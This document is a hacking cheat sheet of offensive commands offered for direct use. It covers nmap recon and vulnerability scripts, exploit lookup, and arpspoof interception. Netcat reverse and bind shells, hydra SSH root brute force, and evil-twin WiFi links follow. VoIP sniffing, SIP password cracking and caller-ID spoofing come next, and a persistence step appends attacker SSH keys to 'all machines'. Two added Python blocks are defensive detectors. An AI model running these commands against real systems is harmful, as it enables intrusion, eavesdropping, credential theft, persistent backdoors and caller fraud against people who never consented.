# H0w t0 h4ck 3v3ryth1ng
## Reconnaissance
0. Optionally, use `threader3000` first to scan for open ports and feed those ports into your nmap command.
1. Nmap the machine to get a general picture:
   - `nmap <ip>` is sufficient for general things
   - `nmap -T<0-5> <ip>` sets the timing template (speed vs. stealth):
     - `-T0` or `-T1` is paranoid / sneaky, meant to bypass an IDS
     - `-T2` is polite -> slow scan, but not that bandwidth intensive
     - `-T3` is normal (the default)
     - `-T4` is aggressive -> fast
     - `-T5` is insane -> super duper fast and intensive :)
   - `-p-` for a full port scan
   - `-sn` host discovery (ping scan) only, no port scan
   - `-Pn` skip host discovery and treat the host as up
   - `-sV [--version-intensity 0-9]` for a service scan; higher intensity means more probes and better accuracy
   - `-A` **Simply use this**, because it does version detection and traceroute (plus OS detection and the default scripts)
2. If you see some open ports, you can run a vulnerability scan:
   - `nmap <ip> --script vuln`
3. There are other script categories worth running, so replace `vuln` e.g. with:
   - `version` runs a more detailed version scan
   - `exploit` searches actively for exploits
   - `discovery` searches for HTML titles, SMB shares (smb-enum-shares) and SNMP devices
   - `broadcast` discovers the local network via broadcasts
### Predefined nmap commands
- SMB vuln check: `nmap --script smb-check-vulns.nse --script-args=unsafe=1 -p445 <ip>` (older nmap releases; newer ones split this into the `smb-vuln-*` scripts)
- SMB enumeration: `nmap --script smb-enum-shares.nse --script-args=unsafe=1 -p445 <ip>`
- SMB OS discovery: `nmap --script smb-os-discovery.nse --script-args=unsafe=1 -p445 <ip>`
- EternalBlue: `nmap -p 445 --script=smb-vuln-ms17-010.nse <ip>`
## Use gained information
### Initial contact
Try to connect to the hosts (HTTP(S), SSH, other open ports) with the dedicated client (browser, ssh client) or with netcat. The information gained can include version numbers (from banners) or flags.
### Googling
Once we know some open ports, or even the service and version behind them, we search for known exploits.
1. Use `searchsploit <searchterm>`
2. Open `msfconsole` and use `search smb`, e.g. for SMB
3. Google it
Most of the time googling leads to a solution for that version if it is vulnerable, and e.g. `exploit-db.com` usually has exploits or Metasploit modules for it that you can use directly in `msfconsole`.
## Snippets
### arpspoof
- two-way for one connection (get all the data on this route): `arpspoof -i <interface> -t <target1> -r <target2>`
- one-way for one host (get all data sent by anyone to this host): `arpspoof -i <interface> <target>`
### netcat IPv4
Reverse shell:
- on machine: `nc <local-ip> 4444 -e /bin/sh`
- local: `nc -nlvp 4444`
Bind shell:
- on machine: `nc -lvp 4444 -e /bin/sh`
- local: `nc <machine-ip> 4444`
Web enumeration with gobuster (gobuster 3 syntax, using the `dir` mode):
- `gobuster dir -u <target-host> -w /usr/share/wordlists/dirbuster/wordlist`
SSH brute force for root:
- `hydra -l root -P /usr/share/wordlists/rockyou.txt <ip> -t 4 ssh`
Quick Python HTTP-Server on local machine serving files from current directory:
- `python3 -m http.server <port>`
## WiFi
Evil Twin Attack on WPA2:
- see https://github.com/FluxionNetwork/fluxion - first [Handshake Snooper](https://github.com/FluxionNetwork/fluxion/wiki/Handshake-Snooper-Attack) and then [Captive Portal](https://github.com/FluxionNetwork/fluxion/wiki/Captive-Portal-Attack)
## Wireshark & TShark
Run both Wireshark and TShark with sudo to see more, or even to see your interfaces at all.
### Wireshark
Change the time display format and name resolution under View if you need it. The View menu is generally very helpful.
Useful display filter options:
- a protocol name, e.g. `udp`, `http`, etc.
- ip.src == 192.168.0.0
- ip.addr == 192.168.0.0
- ip.dst == ...
- && is logical AND
- || is logical OR
- !() is logical NOT
- eth.addr == 00:00:....
- ipv6.addr == ...
- ip - IPv4 only
- ipv6
- udp.port == 53
- tcp.port == ...
- tcp.flags.reset == 1 (for reset flag)
- !(arp or icmp or dns) to keep useless stuff out
Right-click on packets and use the Follow option, or apply filters from the context menu: the field under your mouse pointer is applied as a filter.
### TShark
Important flags:
- `-c` packet count (stop after this many packets)
- `-i` interface
- `-w` write in file
- `-r` read from file
- `-f` for (capture-)filters in BPF syntax, e.g.:
  - "host 192.168.0.1"
  - "net 192.../24"
  - "src net ..."
  - "port 53"
  - "host www.hpi.de"
  - "tcp portrange ..."
  - "ip"
- `-Y` for display filters in Wireshark syntax, e.g.:
  - "sip or rtp"
  - "ip.addr == 192.168.0.1"
There are many other options, but tshark is basically Wireshark on the command line.
## Simple website login brute force
A simple brute force for websites can be done by using hydra. Here is a simple [guide](https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/).
## Zed Attack Proxy (ZAP)
ZAP is a web app vulnerability scanner that can also be used as a proxy between the browser and the server to manipulate or analyse the requests.
It also has a feature for automatically scanning a web server and crawling (spidering) all its contents.
It also has the typical dirbuster functionality (forced browsing).
## Interesting Cheatsheets
- [SQL Injection](https://github.com/OlivierLaflamme/Cheatsheet-God/blob/master/Cheatsheet_SQLInjection.txt)
- [Shells](https://github.com/OlivierLaflamme/Cheatsheet-God/blob/master/Cheatsheet_Shells.txt)
## Voice over IP
This is a general purpose, really useful guide on [voip-hacking](https://hakin9.org/voip-hacking-techniques/).
### Tools
- sipvicious (svmap, svwar, svcrack)
- sipcrack (sipdump, sipcrack)
- inviteflood (for DoS and spoofed caller ID)
- metasploit (search for 'voip', 'sip', or 'rtp' for tools)
  - has some exploits for Asterisk too
- softphones (VoIP clients): linphone (GUI), twinkle (GUI, CLI), pjsua / pjsip (CLI)
- Playing audio over a VoIP client is possible (easier with CLI tools). I have not tested it yet.
### Sniffing
I recommend using Wireshark (not TShark this time) to record any VoIP calls.
To sniff a call:
- open Wireshark with no capture filter and the display filter `sip or rtp` (or just `udp`)
- it becomes easier when the initial SIP signalling is captured too, so start Wireshark before the call data is transmitted
- otherwise, decode one packet as RTP (Decode As...) and hope that Wireshark recognises a complete call
- go to Telephony > RTP > RTP Streams, analyse the stream and export it as an `.au` file
- open the file in Audacity (Wireshark will crash if you play it there)
### Walking through VoIP Challenges
- find VoIP devices: `svmap [-p5060,5061,8000-8100] [-m <method>] <ip-range>`
- arpspoof yourself between the two communication partners
- alternatively, spoof yourself as the VoIP server --> you get all information about the connections but no actual media data
### Cracking passwords
Utilising the server:
- scan the server for extensions (IDs, alphanumeric) --> these are the numbers you can call: `svwar [-e100-2000] [-d dictionary.txt] <ip-addr>`
- try to brute force the authentication: `svcrack -u <username> [-d <dictionary> | -r100-200,1000-2000] <server-ip>`
Utilising some clients:
- sniff their connection (for some authentication packets): `sipdump [-i <interface>] [-f <pcap-filter>] <dump-file>`
- crack the captured hash: `sipcrack [-s | -w <wordlist>] <dump-file>` (`-s` takes passwords over stdin)
### Caller-ID Spoofing
- `inviteflood <interface> <receiver-user> <domain (server-ip)> <receiver-ip> <num. of sent packets> -a "<fake-sender-name>"`
- send very few packages when spoofing a caller-id. Otherwise, it becomes a DoS
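An added detection-side example, not from the original notes or any of the tools above, for what the two bullets above produce on the wire: it parses constructed INVITEs and flags a source sending a flood of them, and a From user arriving from an IP other than the one it registered from. The registration table, IPs and threshold are assumptions made for the example.

```python
import re
from collections import Counter

# Constructed registration table (assumption): the IP each extension last REGISTERed from.
REGISTERED = {"101": "10.0.0.11", "102": "10.0.0.12"}

def build_invite(src, from_user, from_name, call_id):
    """Build a minimal, constructed INVITE as the server would see it: (source IP, raw text)."""
    return (src, f"INVITE sip:100@10.0.0.2 SIP/2.0\r\nVia: SIP/2.0/UDP {src}:5060\r\n"
                 f'From: "{from_name}" <sip:{from_user}@10.0.0.2>;tag=1\r\n'
                 f"To: <sip:100@10.0.0.2>\r\nCall-ID: {call_id}\r\n\r\n")

# One legitimate call from Alice's phone, then 20 INVITEs from an unregistered host claiming to be her.
SAMPLE = [build_invite("10.0.0.11", "101", "Alice", "c1")] + \
         [build_invite("10.0.0.99", "101", "Alice", f"f{i}") for i in range(20)]

def parse_sip(raw):
    """Return method, From display name, From user and Call-ID of one SIP request."""
    lines = raw.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if not line:                       # the empty line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    m = re.match(r'(?:"([^"]*)"\s*)?<sip:([^@>]+)@', headers.get("from", ""))
    return {"method": lines[0].split(" ", 1)[0],
            "name": m.group(1) if m else None,
            "user": m.group(2) if m else None,
            "call_id": headers.get("call-id")}

def analyse(messages, flood_threshold=10):
    """Flag INVITE floods per source and From users sent from an IP other than their registration."""
    invites_per_src = Counter()
    spoofed = set()
    for src, raw in messages:
        msg = parse_sip(raw)
        if msg["method"] != "INVITE":
            continue
        invites_per_src[src] += 1
        registered_ip = REGISTERED.get(msg["user"])
        if registered_ip is not None and registered_ip != src:
            spoofed.add((src, msg["user"], msg["name"]))
    floods = {src for src, n in invites_per_src.items() if n >= flood_threshold}
    return {"floods": floods, "spoofed": spoofed}

if __name__ == "__main__":
    print(analyse(SAMPLE))   # floods {'10.0.0.99'}, spoofed {('10.0.0.99', '101', 'Alice')}
```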
## Add Our SSH Keys to All Machines
- does `~/.ssh/` exist?
- does it have 0700 permissions?
- does `~/.ssh/authorized_keys` exist?
- does it have 0600 permissions?
- is key authentication (`PubkeyAuthentication yes`) enabled in `/etc/ssh/sshd_config`?
- `echo '<our keys>' >> ~/.ssh/authorized_keys`
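The checklist above as an added audit script, not part of the original notes: it checks the directory and file permissions and reads the first `PubkeyAuthentication` value from sshd_config the way sshd does. The 0700/0600 expectations and the assumption that no Match blocks are in use are stated in the code.

```python
import stat
from pathlib import Path

def mode_findings(ssh_dir_mode, authorized_keys_mode):
    """Compare the two permission values from the checklist with the expected 0700 / 0600."""
    findings = []
    if ssh_dir_mode != 0o700:
        findings.append(f"~/.ssh is {ssh_dir_mode:04o}, expected 0700")
    if authorized_keys_mode != 0o600:
        findings.append(f"authorized_keys is {authorized_keys_mode:04o}, expected 0600")
    return findings

def pubkey_auth_enabled(sshd_config_text):
    """sshd takes the first PubkeyAuthentication value it reads; the default is yes.
    Assumption: no Match blocks, whose directives would otherwise be misread here."""
    for line in sshd_config_text.splitlines():
        parts = line.split("#", 1)[0].split()        # drop comments, then tokenise
        if len(parts) >= 2 and parts[0].lower() == "pubkeyauthentication":
            return parts[1].lower() == "yes"
    return True

def audit_key_auth(home, sshd_config="/etc/ssh/sshd_config"):
    """Run the whole checklist for one home directory; an empty list means key auth should work."""
    ssh_dir = Path(home) / ".ssh"
    keys = ssh_dir / "authorized_keys"
    if not ssh_dir.is_dir():
        return ["~/.ssh does not exist"]
    findings = []
    keys_mode = 0o600                                # placeholder while the file is missing
    if keys.is_file():
        keys_mode = stat.S_IMODE(keys.stat().st_mode)
    else:
        findings.append("authorized_keys does not exist")
    findings += mode_findings(stat.S_IMODE(ssh_dir.stat().st_mode), keys_mode)
    try:
        enabled = pubkey_auth_enabled(Path(sshd_config).read_text())
    except OSError:
        findings.append(f"cannot read {sshd_config} to verify PubkeyAuthentication")
    else:
        if not enabled:
            findings.append("PubkeyAuthentication is set to no")
    return findings

if __name__ == "__main__":
    print(audit_key_auth(Path.home()) or ["checklist passes"])
```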
## Important Locations to Check On a New Machine